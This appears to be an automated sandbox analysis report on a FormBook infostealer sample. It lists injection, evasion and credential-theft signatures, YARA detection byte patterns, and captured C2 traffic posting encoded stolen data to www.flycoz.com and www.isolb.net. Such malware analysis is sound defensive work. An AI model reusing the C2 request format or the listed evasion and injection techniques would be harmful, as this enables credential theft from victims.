Play interactive tourEdit tour

# Analysis Report druS9vVaUK.exe

## Overview

### General Information

 Sample Name: druS9vVaUK.exe MD5: e2a5e6e8c1448dfcaf7ae95dff95ade9 SHA1: 33c1ff8589faf0c2469a33131fcdffb01547dab0 SHA256: 8e0003e4f6d537153e60ac5129859a33b57b3b9a36b7d2be62273a6b3a8d5f3f Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64druS9vVaUK.exe (PID: 1320 cmdline: 'C:\Users\user\Desktop\druS9vVaUK.exe' MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)druS9vVaUK.exe (PID: 3876 cmdline: {path} MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)NETSTAT.EXE (PID: 4988 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)cmd.exe (PID: 476 cmdline: /c del 'C:\Users\user\Desktop\druS9vVaUK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)axh0nv7nt03do.exe (PID: 1200 cmdline: 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe' MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x157b9:\$sqlite3step: 68 34 1C 7B E1
• 0x158cc:\$sqlite3step: 68 34 1C 7B E1
• 0x157e8:\$sqlite3text: 68 38 2A 90 C5
• 0x1590d:\$sqlite3text: 68 38 2A 90 C5
• 0x157fb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x15923:\$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x7248:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x74b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x12b35:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x12621:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x12c37:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x12daf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x802a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1189c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x89c3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x17ea7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x18eaa:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x157b9:\$sqlite3step: 68 34 1C 7B E1
• 0x158cc:\$sqlite3step: 68 34 1C 7B E1
• 0x157e8:\$sqlite3text: 68 38 2A 90 C5
• 0x1590d:\$sqlite3text: 68 38 2A 90 C5
• 0x157fb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x15923:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries
SourceRuleDescriptionAuthorStrings
2.2.druS9vVaUK.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.druS9vVaUK.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x149b9:\$sqlite3step: 68 34 1C 7B E1
• 0x14acc:\$sqlite3step: 68 34 1C 7B E1
• 0x149e8:\$sqlite3text: 68 38 2A 90 C5
• 0x14b0d:\$sqlite3text: 68 38 2A 90 C5
• 0x149fb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x14b23:\$sqlite3blob: 68 53 D8 7F 8C
2.2.druS9vVaUK.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x6448:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x66b2:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x11d35:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x11821:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x11e37:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x11faf:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x722a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x10a9c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x7bc3:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x170a7:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x180aa:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.druS9vVaUK.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
2.2.druS9vVaUK.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x157b9:\$sqlite3step: 68 34 1C 7B E1
• 0x158cc:\$sqlite3step: 68 34 1C 7B E1
• 0x157e8:\$sqlite3text: 68 38 2A 90 C5
• 0x1590d:\$sqlite3text: 68 38 2A 90 C5
• 0x157fb:\$sqlite3blob: 68 53 D8 7F 8C
• 0x15923:\$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for domain / URL Show sources
 Source: www.flycoz.com Virustotal: Detection: 8% Perma Link Source: http://www.flycoz.com/te/ Virustotal: Detection: 9% Perma Link Source: http://www.flycoz.com Virustotal: Detection: 8% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe Virustotal: Detection: 33% Perma Link Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe ReversingLabs: Detection: 35%
 Multi AV Scanner detection for submitted file Show sources
 Source: druS9vVaUK.exe Virustotal: Detection: 33% Perma Link Source: druS9vVaUK.exe ReversingLabs: Detection: 35%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Machine Learning detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe Joe Sandbox ML: detected
 Machine Learning detection for sample Show sources
 Source: druS9vVaUK.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 2.2.druS9vVaUK.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 4x nop then pop edi 2_2_00415092 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 4x nop then pop ebx 2_2_004053FD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 5_2_032A53FD Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 5_2_032B5092 Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 5_2_032B40D2

### Networking:

 Uses netstat to query active network connections and open ports Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1Host: www.isolb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1Host: www.flycoz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 209.99.64.55 209.99.64.55
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg). Source: global traffic HTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 146192Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 70 43 39 31 51 28 33 6a 7a 7a 76 48 4f 57 6e 39 59 7e 74 64 53 31 43 43 71 37 75 65 6c 67 71 6a 4d 54 33 72 72 68 41 6e 71 57 35 57 70 6b 58 71 46 51 46 35 38 43 7a 32 4a 31 65 51 57 4d 47 47 6c 34 31 38 4a 7a 4a 58 4e 6c 30 56 41 52 61 7a 38 44 46 43 38 30 75 57 4a 32 66 48 6d 38 69 33 52 57 35 59 6e 54 71 69 46 38 51 54 39 39 79 56 55 37 79 42 63 67 77 6b 35 32 4f 4b 4e 6d 46 31 2d 30 34 76 64 6d 49 48 2d 6d 5a 44 45 59 61 71 7a 6c 37 35 50 42 69 6e 74 66 70 6a 30 28 75 4b 76 77 50 65 45 67 6d 55 61 42 2d 74 51 57 6d 75 35 67 52 6d 6f 50 6c 37 57 70 49 42 52 64 64 31 6f 30 70 59 66 57 58 4b 61 30 38 7e 37 45 44 46 59 33 48 52 4f 58 75 73 69 47 50 30 73 44 71 50 55 48 67 4b 46 44 4b 66 71 79 32 5a 54 41 53 41 38 46 6e 6b 6d 36 41 6c 33 67 36 49 4a 77 35 35 6d 63 71 62 2d 50 4c 56 69 70 50 41 42 65 70 47 47 68 6d 42 75 57 7a 44 79 75 6c 65 55 41 51 32 41 73 36 58 57 45 71 35 69 35 6e 74 7a 50 49 71 76 36 77 69 32 69 50 30 59 53 6f 6f 67 70 4e 62 62 31 53 55 5f 37 4e 31 74 66 32 6e 55 4a 53 50 75 51 37 4a 4b 58 32 71 4f 5a 73 38 63 68 37 62 34 4b 58 6d 68 4f 61 57 6b 7a 68 70 52 45 66 28 58 54 56 58 5f 74 6a 64 56 54 35 73 57 62 78 71 31 6a 6d 77 49 6c 71 34 41 34 6b 79 65 6a 66 43 56 43 78 78 31 62 4e 6d 31 42 7a 52 59 30 4d 4c 55 37 45 42 61 70 65 4c 4c 57 42 67 67 63 7a 6e 4d 78 43 78 76 57 59 79 68 6c 74 41 6c 62 50 44 38 56 77 6b 6f 6e 56 51 69 37 6e 68 42 55 4d 4d 2d 33 56 53 2d 41 4e 68 64 65 53 30 53 55 79 6d 61 71 61 35 30 74 79 65 66 35 7a 46 6e 42 48 56 73 68 45 6a 57 31 51 6f 68 6c 75 7a 59 5a 59 33 71 6c 67 67 51 36 35 63 4b 79 64 4a 58 34 37 61 72 58 41 73 2d 6d 38 28 33 31 42 78 43 30 74 35 34 6a 6c 31 56 34 33 34 7a 4b 39 56 78 34 65 55 68 5a 52 6d 4d 64 61 67 6c 4b 49 47 56 6f 5f 33 64 47 4c 42 75 66 51 67 49 63 72 45 44 42 38 44 68 6e 63 4f 59 67 67 44 4c 4d 73 4f 36 78 37 5a 33 76 6e 6c 4b 56 4f 34 49 54 52 71 38 6a 74 34 30 57 68 43 69 74 41 36 6b 46 50 59 5a 4f 2d 64 32 49 36 39 6f 46 65 37 4d 77 67 46 37 4c 4d 42 74 53 4a 62 65 4f 37 45 6d 41 38 28 64 28 68 63 5f 4c 4d 6c 77 34 45 32 63 63 6c 4c 33 66 41 50 44 39 66 77 62 6c 62 56 58 31 51 4b 58 76 5a 6a 47 76 4f 7e 79 72 32 66 35 6e 48 43 5f 39 73 33 6c 71 44 39 66 6e 42 49 45 4b 78 70 36 6c 32 31 6e 50 73 48 6c 39 78 70 73 28 41 6f 6b 61 6f 66 54 6c 36 61 32 7e 30 7a 72 70 63 71 4a 50 41 42 55 33 44 4f 52 6e 73 58 39 65 6a 76 54 62 76 44 55 67 6c 45 34 6e 72 6e 31 48 72 4c 74 75 61 56 57 36 4e 77 78 66 71 47 52 28 4d 68 4e 66 57 35 78 67 6c 4a 53 72 77 7e 4e 39 78 38 35 28 6a 54 58 66 46 41 45 52 43 42 75 65 58 6e 50 35 64 51 77 6a 41 77 39 6e 36 4c 32
 Source: global traffic HTTP traffic detected: GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1Host: www.isolb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1Host: www.flycoz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.qdbfqfphjidqgtbttnq.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg).
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jun 2020 16:04:43 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 326Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: 404 Not Found

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 Urls found in memory or binary data Show sources

 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmp Binary or memory string:

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Abnormal high CPU Usage Show sources
 Source: C:\Windows\SysWOW64\NETSTAT.EXE Process Stats: CPU usage > 98%
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C800F8 0_2_00C800F8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C81C7C 0_2_00C81C7C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C87DC0 0_2_00C87DC0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C801D6 0_2_00C801D6 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C82AD8 0_2_00C82AD8 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89A00 0_2_00C89A00 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C89218 0_2_00C89218 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C80BE0 0_2_00C80BE0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C813A0 0_2_00C813A0 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C84493 0_2_00C84493 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8D078 0_2_00C8D078 Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8940C 0_2_00C8940C Source: C:\Users\user\Desktop\druS9vVaUK.exe Code function: 0_2_00C8801C 0_2_00C8801C 